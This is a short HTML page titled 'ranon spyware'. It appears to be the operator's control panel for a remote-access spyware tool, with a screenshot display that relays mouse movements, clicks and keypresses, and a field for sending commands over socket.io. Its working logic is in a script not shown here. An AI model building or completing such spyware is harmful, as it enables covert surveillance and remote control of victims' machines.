<!DOCTYPE html>
<html>
  <head>
    <title>ranon spyware</title>
    <link rel="stylesheet" href="style.css" />
   
    <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.1.1/socket.io.js"></script>
    <script src="script.js"></script>
  </head>

  <body onkeypress="writeKey()">
    <p>
      <img src="" id="sc" Onmousemove="mouse_position()" onclick="clicki()" />
    </p>

    <p>
      <input type="text" id="command" value="command" />
    </p>
    <p>
      <button id="submit" onclick="SendCommand()">send the command</button>
    </p>
  </body>
</html>
<!--idk if this function is only the first version-->
